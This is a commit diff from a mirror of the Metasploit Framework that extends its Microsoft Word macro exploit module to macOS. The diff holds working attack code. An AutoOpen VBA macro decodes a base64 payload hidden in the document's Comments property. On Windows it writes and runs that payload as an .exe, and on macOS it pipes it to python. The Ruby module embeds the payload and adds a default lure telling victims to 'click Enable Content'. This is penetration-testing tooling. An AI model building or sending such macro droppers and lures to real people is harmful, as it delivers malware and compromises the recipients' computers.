infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Support OS X for Microsoft Office macro exploit

bug/bundler_fix
wchen-r7 2017-02-16 12:28:11 -06:00
parent 082ebe23db
commit 3d269b46ad
4 changed files with 43 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
data/exploits/office_word_macro/word/vbaData.xml Normal file → Executable file
View File

@ -1,2 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

BIN
data/exploits/office_word_macro/word/vbaProject.bin Normal file → Executable file
View File

Binary file not shown.

42
external/source/exploits/office_word_macro/macro.vba vendored
View File

@ -1,3 +1,5 @@
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
On Error Resume Next
Dim found_value As String
@ -6,17 +8,31 @@ Sub AutoOpen()
If prop.Name = "Comments" Then
found_value = Mid(prop.Value, 56)
orig_val = Base64Decode(found_value)
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (orig_val)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
#If Mac Then
ExecuteForOSX (orig_val)
#Else
ExecuteForWindows (orig_val)
#End If
Exit For
End If
Next
End Sub
Sub ExecuteForWindows(code)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
tmp_folder = fso.GetSpecialFolder(2)
tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
Set f = fso.createTextFile(tmp_name)
f.Write (code)
f.Close
CreateObject("WScript.Shell").Run (tmp_name)
End Sub
Sub ExecuteForOSX(code)
system ("echo """ & code & """ | python &")
End Sub
' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
@ -27,12 +43,10 @@ Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
'remove white spaces, If any
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
'The source must consists from groups with Len of 4 chars
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
@ -40,18 +54,12 @@ Function Base64Decode(ByVal base64String)
End If
' Now decode each group:
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
' Each data group encodes up To 3 actual bytes.
numDataBytes = 3
nGroup = 0
For CharCounter = 0 To 3
' Convert each character into 6 bits of data, And add it To
' an integer For temporary storage. If a character is a '=', there
' is one fewer data byte. (There can only be a maximum of 2 '=' In
' the whole string.)
thisChar = Mid(base64String, groupBegin + CharCounter, 1)
@ -69,18 +77,14 @@ Function Base64Decode(ByVal base64String)
nGroup = 64 * nGroup + thisData
Next
'Hex splits the long To 6 groups with 4 bits
nGroup = Hex(nGroup)
'Add leading zeros
nGroup = String(6 - Len(nGroup), "0") & nGroup
'Convert the 3 byte hex integer (6 chars) To 3 characters
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
'add numDataBytes characters To out string
sOut = sOut & Left(pOut, numDataBytes)
Next

25
modules/exploits/windows/fileformat/office_word_macro.rb
View File

@ -36,18 +36,30 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Microsoft Office Word', {}],
[
'Microsoft Office Word on Windows',
{
'Platform' => 'win',
}
],
[
'Microsoft Office Word on Mac OS X (Python)',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON
}
]
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
'DisclosureDate' => "Jan 10 2012"
))
register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new("BODY", [false, 'The message for the document body',
'Contents of this document are protected. Please click Enable Content to continue.'
]),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end
@ -60,8 +72,9 @@ class MetasploitModule < Msf::Exploit::Remote
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
b64_payload << Rex::Text.encode_base64(p)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end